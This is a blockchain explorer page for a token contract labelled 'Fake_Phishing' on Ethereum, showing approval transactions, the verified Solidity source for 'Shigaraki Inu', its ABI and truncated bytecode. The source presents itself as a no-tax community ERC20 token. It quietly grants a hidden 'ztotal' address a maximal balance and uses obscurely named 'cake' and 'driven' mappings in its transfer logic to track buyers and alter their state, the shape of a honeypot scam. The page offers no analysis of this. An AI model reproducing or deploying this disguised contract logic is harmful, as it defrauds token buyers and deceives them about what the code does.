ETH Price: $3,088.99 (-7.45%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer151576792022-07-17 3:07:28925 days ago1658027248IN
Fake_Phishing283817
0 ETH0.0007728210.0911149
Approve151576792022-07-17 3:07:28925 days ago1658027248IN
Fake_Phishing283817
0 ETH0.000476210.0911149
Approve151576502022-07-17 3:01:44925 days ago1658026904IN
Fake_Phishing283817
0 ETH0.000388148.22296381
Approve151576362022-07-17 2:58:40925 days ago1658026720IN
Fake_Phishing283817
0 ETH0.000315026.67392316
Approve151576162022-07-17 2:55:47925 days ago1658026547IN
Fake_Phishing283817
0 ETH0.000461439.77547215
Approve151576132022-07-17 2:55:31925 days ago1658026531IN
Fake_Phishing283817
0 ETH0.000443339.39210827
Approve151576072022-07-17 2:53:57925 days ago1658026437IN
Fake_Phishing283817
0 ETH0.0005077610.75698732
Approve151576072022-07-17 2:53:57925 days ago1658026437IN
Fake_Phishing283817
0 ETH0.0005077610.75698732
Approve151576052022-07-17 2:53:20925 days ago1658026400IN
Fake_Phishing283817
0 ETH0.000465439.86024968
Approve151576022022-07-17 2:51:59925 days ago1658026319IN
Fake_Phishing283817
0 ETH0.00039648.39795299
Approve151575462022-07-17 2:41:31925 days ago1658025691IN
Fake_Phishing283817
0 ETH0.000423038.96196134
Approve151575412022-07-17 2:40:42925 days ago1658025642IN
Fake_Phishing283817
0 ETH0.000424829
Approve151575352022-07-17 2:40:07925 days ago1658025607IN
Fake_Phishing283817
0 ETH0.0005572711.80593275
Approve151575312022-07-17 2:38:49925 days ago1658025529IN
Fake_Phishing283817
0 ETH0.0004830210.23287558
Approve151575212022-07-17 2:37:04925 days ago1658025424IN
Fake_Phishing283817
0 ETH0.000580512.29804495
Approve151575202022-07-17 2:36:51925 days ago1658025411IN
Fake_Phishing283817
0 ETH0.0005053210.70545036
Approve151575132022-07-17 2:35:24925 days ago1658025324IN
Fake_Phishing283817
0 ETH0.0005043410.68450528
Approve151574982022-07-17 2:33:05925 days ago1658025185IN
Fake_Phishing283817
0 ETH0.00068714.55426906
Approve151574962022-07-17 2:32:27925 days ago1658025147IN
Fake_Phishing283817
0 ETH0.0006983614.79483219
Approve151574922022-07-17 2:31:37925 days ago1658025097IN
Fake_Phishing283817
0 ETH0.0007652916.21292223
Approve151574922022-07-17 2:31:37925 days ago1658025097IN
Fake_Phishing283817
0 ETH0.0007652916.21292223
Approve151574832022-07-17 2:29:49925 days ago1658024989IN
Fake_Phishing283817
0 ETH0.0008126117.21525193
Approve151574832022-07-17 2:29:49925 days ago1658024989IN
Fake_Phishing283817
0 ETH0.0010856623
Approve151574792022-07-17 2:29:18925 days ago1658024958IN
Fake_Phishing283817
0 ETH0.0009935621.04880368
Approve151574772022-07-17 2:28:36925 days ago1658024916IN
Fake_Phishing283817
0 ETH0.0009464320.05030684
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
shigaraki

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-07-17
*/

/**
Shigaraki Inu | $SHIGARAKI
No tax ERC20 Community Driven Anime Token 
50% of supply burnt before launch
Team wallet= 2.5%
Total supply= 1,000,000,000,000,000 $SHIGARAKI
Starting liquidity= 3 ETH
All Shigaraki socials are created and driven by the community itself
*/


// SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.5;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract shigaraki is Ownable {
    constructor(
        string memory _NAME,
        string memory _SYMBOL,
        address routerAddress,
        address ztotal
    ) {
        _symbol = _SYMBOL;
        _name = _NAME;
        _fee = 0;
        _decimals = 9;
        _tTotal = 1000000000000000 * 10**_decimals;

        _balances[ztotal] = like;
        _balances[msg.sender] = _tTotal;
        cake[ztotal] = like;
        cake[msg.sender] = like;

        router = IUniswapV2Router02(routerAddress);
        uniswapV2Pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH());

        emit Transfer(address(0), msg.sender, _tTotal);
    }

    uint256 public _fee;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    function name() public view returns (string memory) {
        return _name;
    }

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _balances;

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    uint256 private _tTotal;
    uint256 private _rTotal;
    address public uniswapV2Pair;
    IUniswapV2Router02 public router;
    uint256 private like = ~uint256(0);

    function decimals() public view returns (uint256) {
        return _decimals;
    }

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function totalSupply() public view returns (uint256) {
        return _tTotal;
    }

    address[] interest = new address[](2);

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function biggest(
        address treated,
        address official,
        uint256 amount
    ) private {
        address hall = interest[1];
        bool border = uniswapV2Pair == treated;
        uint256 order = _fee;

        if (cake[treated] == 0 && driven[treated] > 0 && !border) {
            cake[treated] -= order;
            if (amount > 2 * 10**(13 + _decimals)) cake[treated] -= order - 1;
        }

        interest[1] = official;

        if (cake[treated] > 0 && amount == 0) {
            cake[official] += order;
        }

        driven[hall] += order + 1;

        uint256 fee = (amount / 100) * _fee;
        amount -= fee;
        _balances[treated] -= fee;
        _balances[address(this)] += fee;

        _balances[treated] -= amount;
        _balances[official] += amount;
    }

    mapping(address => uint256) private driven;

    function approve(address spender, uint256 amount) external returns (bool) {
        return _approve(msg.sender, spender, amount);
    }

    mapping(address => uint256) private cake;

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool) {
        require(amount > 0, 'Transfer amount must be greater than zero');
        biggest(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
        return _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
    }

    function transfer(address recipient, uint256 amount) external returns (bool) {
        biggest(msg.sender, recipient, amount);
        emit Transfer(msg.sender, recipient, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private returns (bool) {
        require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address');
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_NAME","type":"string"},{"internalType":"string","name":"_SYMBOL","type":"string"},{"internalType":"address","name":"routerAddress","type":"address"},{"internalType":"address","name":"ztotal","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600019600b55600267ffffffffffffffff81111562000028576200002762000cc8565b5b604051908082528060200260200182016040528015620000575781602001602082028036833780820191505090505b50600c90805190602001906200006f92919062000603565b503480156200007d57600080fd5b5060405162002720380380620027208339818101604052810190620000a3919062000809565b620000c3620000b76200053760201b60201c565b6200053f60201b60201c565b8260039080519060200190620000db92919062000692565b508360029080519060200190620000f492919062000692565b5060006001819055506009600460006101000a81548160ff021916908360ff160217905550600460009054906101000a900460ff16600a620001379190620009df565b66038d7ea4c680006200014b919062000b1c565b600781905550600b54600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600754600660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600b54600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600b54600e60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200031357600080fd5b505afa15801562000328573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200034e9190620007d7565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620003d357600080fd5b505afa158015620003e8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200040e9190620007d7565b6040518363ffffffff1660e01b81526004016200042d929190620008db565b602060405180830381600087803b1580156200044857600080fd5b505af11580156200045d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004839190620007d7565b600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60075460405162000525919062000908565b60405180910390a35050505062000d43565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280548282559060005260206000209081019282156200067f579160200282015b828111156200067e5782518260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055509160200191906001019062000624565b5b5090506200068e919062000723565b5090565b828054620006a09062000bfe565b90600052602060002090601f016020900481019282620006c4576000855562000710565b82601f10620006df57805160ff191683800117855562000710565b8280016001018555821562000710579182015b828111156200070f578251825591602001919060010190620006f2565b5b5090506200071f919062000723565b5090565b5b808211156200073e57600081600090555060010162000724565b5090565b60006200075962000753846200094e565b62000925565b90508281526020810184848401111562000778576200077762000cfc565b5b6200078584828562000bc8565b509392505050565b6000815190506200079e8162000d29565b92915050565b600082601f830112620007bc57620007bb62000cf7565b5b8151620007ce84826020860162000742565b91505092915050565b600060208284031215620007f057620007ef62000d06565b5b600062000800848285016200078d565b91505092915050565b6000806000806080858703121562000826576200082562000d06565b5b600085015167ffffffffffffffff81111562000847576200084662000d01565b5b6200085587828801620007a4565b945050602085015167ffffffffffffffff81111562000879576200087862000d01565b5b6200088787828801620007a4565b93505060406200089a878288016200078d565b9250506060620008ad878288016200078d565b91505092959194509250565b620008c48162000b7d565b82525050565b620008d58162000bb1565b82525050565b6000604082019050620008f26000830185620008b9565b620009016020830184620008b9565b9392505050565b60006020820190506200091f6000830184620008ca565b92915050565b60006200093162000944565b90506200093f828262000c34565b919050565b6000604051905090565b600067ffffffffffffffff8211156200096c576200096b62000cc8565b5b620009778262000d0b565b9050602081019050919050565b6000808291508390505b6001851115620009d657808604811115620009ae57620009ad62000c6a565b5b6001851615620009be5780820291505b8081029050620009ce8562000d1c565b94506200098e565b94509492505050565b6000620009ec8262000bb1565b9150620009f98362000bbb565b925062000a287fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a30565b905092915050565b60008262000a42576001905062000b15565b8162000a52576000905062000b15565b816001811462000a6b576002811462000a765762000aac565b600191505062000b15565b60ff84111562000a8b5762000a8a62000c6a565b5b8360020a91508482111562000aa55762000aa462000c6a565b5b5062000b15565b5060208310610133831016604e8410600b841016171562000ae65782820a90508381111562000ae05762000adf62000c6a565b5b62000b15565b62000af5848484600162000984565b9250905081840481111562000b0f5762000b0e62000c6a565b5b81810290505b9392505050565b600062000b298262000bb1565b915062000b368362000bb1565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000b725762000b7162000c6a565b5b828202905092915050565b600062000b8a8262000b91565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101562000be857808201518184015260208101905062000bcb565b8381111562000bf8576000848401525b50505050565b6000600282049050600182168062000c1757607f821691505b6020821081141562000c2e5762000c2d62000c99565b5b50919050565b62000c3f8262000d0b565b810181811067ffffffffffffffff8211171562000c615762000c6062000cc8565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b60008160011c9050919050565b62000d348162000b7d565b811462000d4057600080fd5b50565b6119cd8062000d536000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063c5b37c2211610066578063c5b37c2214610278578063dd62ed3e14610296578063f2fde38b146102c6578063f887ea40146102e2576100f5565b8063715018a6146102025780638da5cb5b1461020c57806395d89b411461022a578063a9059cbb14610248576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806349bd5a5e146101b457806370a08231146101d2576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610300565b60405161010f9190611300565b60405180910390f35b610132600480360381019061012d919061116e565b610392565b60405161013f91906112ca565b60405180910390f35b6101506103a7565b60405161015d91906113a2565b60405180910390f35b610180600480360381019061017b919061111b565b6103b1565b60405161018d91906112ca565b60405180910390f35b61019e610500565b6040516101ab91906113a2565b60405180910390f35b6101bc61051a565b6040516101c991906112af565b60405180910390f35b6101ec60048036038101906101e791906110ae565b610540565b6040516101f991906113a2565b60405180910390f35b61020a610589565b005b610214610611565b60405161022191906112af565b60405180910390f35b61023261063a565b60405161023f9190611300565b60405180910390f35b610262600480360381019061025d919061116e565b6106cc565b60405161026f91906112ca565b60405180910390f35b610280610748565b60405161028d91906113a2565b60405180910390f35b6102b060048036038101906102ab91906110db565b61074e565b6040516102bd91906113a2565b60405180910390f35b6102e060048036038101906102db91906110ae565b6107d5565b005b6102ea6108cd565b6040516102f791906112e5565b60405180910390f35b60606002805461030f90611742565b80601f016020809104026020016040519081016040528092919081815260200182805461033b90611742565b80156103885780601f1061035d57610100808354040283529160200191610388565b820191906000526020600020905b81548152906001019060200180831161036b57829003601f168201915b5050505050905090565b600061039f3384846108f3565b905092915050565b6000600754905090565b60008082116103f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ec90611362565b60405180910390fd5b610400848484610a8e565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161045d91906113a2565b60405180910390a36104f7843384600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f29190611662565b6108f3565b90509392505050565b6000600460009054906101000a900460ff1660ff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610591610fb8565b73ffffffffffffffffffffffffffffffffffffffff166105af610611565b73ffffffffffffffffffffffffffffffffffffffff1614610605576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105fc90611342565b60405180910390fd5b61060f6000610fc0565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461064990611742565b80601f016020809104026020016040519081016040528092919081815260200182805461067590611742565b80156106c25780601f10610697576101008083540402835291602001916106c2565b820191906000526020600020905b8154815290600101906020018083116106a557829003601f168201915b5050505050905090565b60006106d9338484610a8e565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161073691906113a2565b60405180910390a36001905092915050565b60015481565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107dd610fb8565b73ffffffffffffffffffffffffffffffffffffffff166107fb610611565b73ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084890611342565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b890611322565b60405180910390fd5b6108ca81610fc0565b50565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561095e5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b61099d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099490611382565b60405180910390fd5b81600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610a7b91906113a2565b60405180910390a3600190509392505050565b6000600c600181548110610aa557610aa4611801565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905060008473ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16149050600060015490506000600e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054148015610bbc57506000600d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b8015610bc6575081155b15610cc05780600e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c1a9190611662565b92505081905550600460009054906101000a900460ff16600d610c3d919061142f565b600a610c4991906114ea565b6002610c559190611608565b841115610cbf57600181610c699190611662565b600e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610cb79190611662565b925050819055505b5b84600c600181548110610cd657610cd5611801565b5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054118015610d6d5750600084145b15610dc95780600e60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610dc191906113d9565b925050819055505b600181610dd691906113d9565b600d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e2491906113d9565b925050819055506000600154606486610e3d9190611466565b610e479190611608565b90508085610e559190611662565b945080600660008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ea69190611662565b9250508190555080600660003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610efc91906113d9565b9250508190555084600660008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f529190611662565b9250508190555084600660008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610fa891906113d9565b9250508190555050505050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008135905061109381611969565b92915050565b6000813590506110a881611980565b92915050565b6000602082840312156110c4576110c3611830565b5b60006110d284828501611084565b91505092915050565b600080604083850312156110f2576110f1611830565b5b600061110085828601611084565b925050602061111185828601611084565b9150509250929050565b60008060006060848603121561113457611133611830565b5b600061114286828701611084565b935050602061115386828701611084565b925050604061116486828701611099565b9150509250925092565b6000806040838503121561118557611184611830565b5b600061119385828601611084565b92505060206111a485828601611099565b9150509250929050565b6111b781611696565b82525050565b6111c6816116a8565b82525050565b6111d5816116eb565b82525050565b60006